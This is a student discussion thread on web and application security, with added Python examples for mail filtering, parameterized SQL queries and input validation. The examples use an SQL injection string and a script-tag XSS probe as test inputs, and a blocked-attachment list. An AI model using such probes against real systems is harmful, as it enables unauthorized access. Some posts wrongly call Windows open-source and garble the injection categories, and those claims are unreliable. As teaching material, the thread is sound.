PC users are a major target, attacked through the browser. Once the user is compromised, beyond the data stored on the user’s PC, the cybercriminals can use this user’s system to attack other systems to which the user has access credentials. Because Microsoft Windows has many built-in ActiveX components, some malicious sites use ActiveX to install viruses or backdoors automatically. By using scripting languages, the attacker can modify and add file content, access login information, or execute an external executable file directly from the browser. Even though the Microsoft Edge browser does not support ActiveX and replaced Internet Explorer, Windows 10 continues to have Internet Explorer 11 built in for users to choose from.
Mei X Wang says
Hi Cami,
I agree PCs are a large attack target; Microsoft should really figure out a way to remediate these outdated add-ons with common vulnerabilities like ActiveX. Another reason why PCs are so commonly attacked is how open-source the systems are. Compared to Apple’s closed system models, Windows vulnerabilities are more commonly disclosed in forums and exploited because of the visibility.
Anthony Wong says
One takeaway from this chapter is the difference between WWW service and E-Commerce service. The book refers to WWW service as the basic functionality of HTTP web servers that are responsible for retrieving static and dynamic web pages using the software installed on the server. The two main web servers are Microsoft’s IIS and the Linux Apache server. E-Commerce service refers to the additional functionality a website uses for buying and selling products, integration with external and internal applications, handling shipping information, etc. Although organizations create their own custom software to support some e-commerce functionality, the process cannot be completed alone. For example, in a checkout process, the software needs to be integrated with multiple credit card providers so that each can be accepted as a payment type. To accept VISA, there needs to be integration with VISA’s backend systems to process a transaction.
Zhen Li says
Hi, Anthony. Thank you for sharing your points; I agree with them. Also, WWW service and e-commerce security have lots of disadvantages: firstly, there is the cost of disruptions and the harm to reputation and market capitalization. Secondly, it can cause customer fraud. Thirdly, it increases the exposure of sensitive private information.
Vanessa Marin says
I use SQL on a daily basis as a Business Analyst. I am constantly querying the database for things that my client may need, especially during data migration from a legacy system into the new implementation of financial software. As such, the section on SQL injections stood out to me. SQL attacks send modified queries to try to modify the database of an application. It can also execute commands on a server.
My key takeaway from this chapter was the attack methods using SQL injection.
– In-band injections extract data from the DB and make it public in a web browser.
– Out-of-band injections use malformed statements to extract data from sources like email instead of directly from the DB.
– Inferential injections extract metadata from the DB about the DB itself.
  – Error-based inference assumes the DB receives a query based on error messages.
  – Blind injection uses multiple statements that work together, causing a single error message to be generated for different types of errors. This could be a serious attack, as it could put the system in a loop of performing a trivial task a million times, for example.
Measures can be taken to protect a DB from a SQL injection attack by parameterizing and sanitizing queries, limiting the permissions required to run the web app, and using stored procedures.
Zhen Li says
The key point that I took away from this chapter is the WWW service and E-commerce service. We will use the term WWW service for the basic functionality of HTTP webservers, including the retrieval of static files (fixed webpages) and the creation of dynamic webpages (webpages created in response to a specific query) using software on the webserver. We will use the term e-commerce service to refer to the additional software needed for buying and selling, including online catalogs, shopping carts, checkout functions, connections to back-end databases within the firm, and links to outside organizations, such as banks.
WWW service and e-commerce security have lots of disadvantages: firstly, there is the cost of disruptions and the harm to reputation and market capitalization. Secondly, they can cause customer fraud. Thirdly, they increase the exposure of sensitive private information.
Junhan Hao says
Hi Zhen,
I think your point that WWW service has a lot of disadvantages is very interesting. The Web has become the main means for many people to find and browse information on the Internet. You can set up a web server on a Linux host, store your homepage on your own web server, and publish your homepage to the outside world through it.
Junhan Hao says
E-mail filtering is an important part of an organization. The SMTP protocol and POP3 protocol are mainly used in the mail delivery process. Among them, the client uses the SMTP protocol when sending mail to the mail server, and the client uses the POP3 protocol when receiving mail from the mail server. From the perspective of the mail server, spam and emails with harmful content are all delivered to the user mailbox of the mail server through the SMTP protocol. Therefore, filtering external mail delivered to the local mail server through the SMTP protocol achieves the purpose of protecting local mail users from spam, reactionary mail, etc.
The basis of mail filtering is filtering rules. In order to achieve effective mail filtering, multi-level mail filtering rules need to be formulated. The filtering algorithm performed by the system according to the filtering rules should have a certain degree of intelligence.
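The multi-level rules described in the two posts above (hard blocks on harmful attachments, then a scored spam check) can be sketched as a small server-side filter. This is an added example written for this discussion, not code from the textbook or from any mail vendor; the three sample messages are constructed inline, and the rule names, weights and threshold are illustrative assumptions.

```python
"""Multi-level filtering rules for mail arriving at a receiving SMTP server.

Added example for this discussion thread; it is not code from the textbook
or from any mail vendor. The three sample messages are constructed inline,
and the rule names, weights and threshold are assumptions chosen to
illustrate a two-level policy: hard blocks first, then a scored spam check.
"""
import re
from email import message_from_string
from email.message import EmailMessage, Message
from typing import Dict, List, Tuple

# Level 1: hard-block rules. A single match quarantines the message outright.
BLOCKED_EXTENSIONS = {".exe", ".scr", ".js", ".vbs", ".bat", ".com", ".pif"}
BLOCKED_MIME_TYPES = {"application/x-msdownload", "application/x-dosexec"}

# Level 2: scored spam heuristics (pattern, weight, rule name). Weights are
# illustrative assumptions, not calibrated values.
SPAM_RULES = [
    (re.compile(r"\b(free|winner|prize|lottery)\b", re.I), 2.0, "lottery-words"),
    (re.compile(r"\burgent\b.*\baccount\b", re.I | re.S), 2.5, "urgent-account"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"), 3.0, "ip-literal-url"),
    (re.compile(r"!{3,}"), 1.0, "excess-exclamation"),
]
SPAM_THRESHOLD = 4.0


def dangerous_attachments(msg: Message) -> List[str]:
    """Return the filenames of attachments that match a hard-block rule."""
    names = []
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        filename = part.get_filename() or ""
        ext = filename[filename.rfind("."):].lower() if "." in filename else ""
        if ext in BLOCKED_EXTENSIONS or part.get_content_type() in BLOCKED_MIME_TYPES:
            names.append(filename or "<unnamed>")
    return names


def spam_score(msg: Message) -> Tuple[float, List[str]]:
    """Score the subject plus every text/plain body part against SPAM_RULES."""
    text = msg.get("Subject", "")
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True)
            if payload:
                text += "\n" + payload.decode("utf-8", "replace")
    score, hits = 0.0, []
    for pattern, weight, name in SPAM_RULES:
        if pattern.search(text):
            score += weight
            hits.append(name)
    return score, hits


def classify(raw_message: str) -> Dict[str, object]:
    """Apply level 1, then level 2, and return the delivery verdict."""
    msg = message_from_string(raw_message)
    blocked = dangerous_attachments(msg)
    if blocked:
        return {"verdict": "quarantine", "reason": "attachment", "details": blocked}
    score, hits = spam_score(msg)
    if score >= SPAM_THRESHOLD:
        return {"verdict": "spam", "reason": "score", "score": score, "details": hits}
    return {"verdict": "deliver", "reason": "clean", "score": score, "details": hits}


def build_sample(subject: str, body: str, attachment=None) -> str:
    """Construct a test message (sample data, not captured mail)."""
    msg = EmailMessage()
    msg["From"] = "sender@example.test"
    msg["To"] = "user@example.test"
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment:
        name, data = attachment
        msg.add_attachment(data, maintype="application", subtype="octet-stream",
                           filename=name)
    return msg.as_string()


# Constructed samples: a disguised executable, a scam lure, and a normal note.
SAMPLE_MESSAGES = {
    "disguised_exe": build_sample("Invoice", "See attached.",
                                  ("invoice.pdf.exe", b"MZ\x90\x00 constructed bytes")),
    "lottery_lure": build_sample("You are a WINNER!!!",
                                 "Claim your free prize at http://203.0.113.5/claim"),
    "weekly_report": build_sample("Weekly report",
                                  "Minutes from Monday's meeting are below."),
}

if __name__ == "__main__":
    for label, raw in SAMPLE_MESSAGES.items():
        print(label, classify(raw))
```

The order of the two levels matters: an executable disguised with a double extension is quarantined before any scoring happens, so it cannot slip through by looking like a polite business message, while the scored level leaves room for tuning weights against the over-filtering problem raised elsewhere in the thread.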
Prince Patel says
One of the topics that I found interesting this week is SQL injection attacks. When database access is being implemented, the user may be prompted for certain information, such as a username, password, or account PIN code. This input is then tested with an SQL query. For instance, if you type your name, the string you type, $name, may be input into an SQL query to find your address. If input checking is not done, or is poorly done, an attacker may be able to use SQL injection to enter a string that includes both the user’s name and more SQL query.
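The $name address lookup just described, and the parameterized-query defense listed a few posts earlier, side by side in runnable form. This is an added example for the thread, not code from the textbook; it uses an in-memory SQLite table whose rows are constructed here.

```python
"""String-built SQL query beside its parameterized replacement.

Added example for this discussion thread; not code from the textbook. It uses
an in-memory SQLite table whose rows are constructed here. The address lookup
mirrors the $name scenario above: the same input is sent through a query that
splices the string into SQL text and through one that binds it as a parameter.
"""
import sqlite3
from typing import List, Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table; the rows are illustrative, not real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, address TEXT, pin TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "1 Main St", "1234"),
        ("bob", "2 Oak Ave", "9876"),
    ])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """No input checking: the string becomes part of the SQL grammar."""
    sql = "SELECT name, address FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """The value is bound as a parameter, so the database never parses it as SQL."""
    sql = "SELECT name, address FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def error_leak(conn: sqlite3.Connection, name: str) -> Optional[str]:
    """Return the raw database error text the vulnerable path would expose.

    An application that echoes this text to the browser provides the
    error-based inference channel mentioned above; the safe path raises nothing.
    """
    try:
        lookup_vulnerable(conn, name)
    except sqlite3.Error as exc:
        return str(exc)
    return None


def compare(name: str) -> dict:
    """Row counts returned for the same input by the vulnerable and safe paths."""
    conn = make_db()
    try:
        vulnerable_rows = len(lookup_vulnerable(conn, name))
    except sqlite3.Error:
        vulnerable_rows = -1  # the spliced query did not even parse
    return {
        "vulnerable_rows": vulnerable_rows,
        "safe_rows": len(lookup_safe(conn, name)),
        "leaked_error": error_leak(conn, name),
    }


if __name__ == "__main__":
    for probe in ("alice", "x' OR '1'='1", "o'brien"):
        print(repr(probe), compare(probe))
```

Three probes tell the story: a real name returns one row either way; a name carrying extra SQL returns the whole table from the spliced query and nothing from the bound one; and a legitimate name with an apostrophe breaks the spliced query outright, which is both a correctness bug and the error message an inference attack feeds on.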
Heather Ergler says
I also found the different types of SQL injection attacks interesting. Whether it is an in-band attack that extracts data directly from the database or an out-of-band attack that uses improperly formed SQL statements to extract data through a different application, there are many methods to create a SQL injection attack.
Anthony Messina says
The section on web security really stood out. It seems that many times an attacker’s first entry point into a network is going to be through the Internet-facing web server. Attackers like to leverage scripting languages such as JavaScript or VBScript to inject code into a webpage. Malicious script attacks allow attackers to execute any command they choose on a victim’s computer, many times in the form of a command shell. Attackers also leverage website cookies, which are small text strings that the website owner can place on a client computer. If an attacker is able to get a user to visit a malicious website, through social engineering for example, cookies can be placed in the user’s browser. These cookies can then be harvested for login names and passwords.
Humbert Amiani says
Hi Anthony,
The most vulnerable point of entry for attackers is always an outward-facing system/application. Most organizations focus on protecting their web servers without knowing all the other systems and applications they may have that are accessible from the outside. Sometimes such applications can have components that are accessible to their business partners and vendors only. However, if those external entities are compromised, then they put the organization at risk as well.
Humbert Amiani says
Under application security, a key component to hardening applications is security baselines for application minimization. This enables security professionals to either reduce the number of applications or at least reduce the number of services that are not necessarily being used by applications. These two options greatly reduce the attack surface and hence work towards hardening the systems at large. Disabling superfluous apps and services is a basic step to reducing the amount of logging and monitoring that must be done to secure the system.
Another concept is securing custom applications that are in use within the organization. The first and best way to start is by ensuring that all user input is validated or checked in some way before being forwarded within/between applications. This validation can prevent a wide range of known attacks such as SQL injections and even cross-site scripting attacks to some extent. Securing applications and all their components is a vital step in ensuring the system is well hardened.
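The input validation the post above recommends for custom applications, as an added example rather than code from the textbook or the thread. It pairs an allow-list check for structured fields with output encoding for free text, which is why validation helps against SQL injection and only partly against cross-site scripting; the field rules, greeting template and sample form are all constructed here.

```python
"""Allow-list input validation plus output encoding for custom applications.

Added example for this discussion thread; not code from the textbook. The
field rules, the HTML greeting template and the sample form are constructed
here. Structured fields (username, PIN, zip code) are validated against an
allow-list before they are forwarded; free text that cannot be allow-listed
is instead encoded for the context in which it is emitted.
"""
import html
import re
from typing import Dict, Tuple
from urllib.parse import quote

# Allow-list patterns: what a field is permitted to look like, not a
# block-list of known-bad characters.
FIELD_RULES = {
    "username": re.compile(r"[A-Za-z][A-Za-z0-9_.-]{2,31}"),
    "account_pin": re.compile(r"\d{4,8}"),
    "zip_code": re.compile(r"\d{5}(?:-\d{4})?"),
}


class ValidationError(ValueError):
    """Raised when a value does not match its field's allow-list."""


def validate(field: str, value: object) -> str:
    """Return value unchanged if it fully matches the field's allow-list."""
    rule = FIELD_RULES.get(field)
    if rule is None:
        raise ValidationError(f"unknown field {field!r}")
    if not isinstance(value, str) or rule.fullmatch(value) is None:
        raise ValidationError(f"{field} rejected")
    return value


def check_form(form: Dict[str, object]) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Split a submitted form into accepted values and per-field rejections."""
    accepted, rejected = {}, {}
    for field, value in form.items():
        try:
            accepted[field] = validate(field, value)
        except ValidationError as exc:
            rejected[field] = str(exc)
    return accepted, rejected


def render_greeting(display_name: str) -> str:
    """HTML body context: escape so the browser renders text, not markup.

    A display name is free text and cannot be allow-listed, so the defense
    for this field lives at output time rather than at input time.
    """
    return "<p>Welcome, %s</p>" % html.escape(display_name, quote=True)


def profile_link(username: str) -> str:
    """URL path context: validate first, then percent-encode for the path."""
    return "/users/" + quote(validate("username", username), safe="")


# Constructed sample submission: one valid field, one injection-looking
# username, one malformed PIN.
SAMPLE_FORM = {
    "username": "alice' OR '1'='1",
    "account_pin": "12ab",
    "zip_code": "19122",
}

if __name__ == "__main__":
    print(check_form(SAMPLE_FORM))
    print(render_greeting("<script>alert(1)</script>"))
    print(profile_link("alice_01"))
```

Rejected fields are reported per field rather than by raising on the first one, so the application can return all of the problems to the user at once while still forwarding nothing that failed its allow-list.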
Heather Ergler says
I learned about the steps one can take to harden applications, including first knowing the server’s role by minimizing the number of applications running on a server, so that only the services needed to run the application are on the server and all other extraneous services are disabled or uninstalled. After understanding the server’s role, steps like physical security, backup, hardening the OS, minimizing applications, defining subsidiary applications, and using baselines to guide security set-up on the server can be completed. The application should be configured to go beyond the default configuration by specifying the services and database accounts, hardware and devices that it interacts with, rejecting all other network traffic, and changing the default passwords. The application should be kept up to date and patched, and the permissions of the application should be minimized to just what is needed to run the application. The application should also own the authentication, authorization, and auditing at the application layer. Cryptography should be enabled for all communication with users. These are the steps taken to harden the application.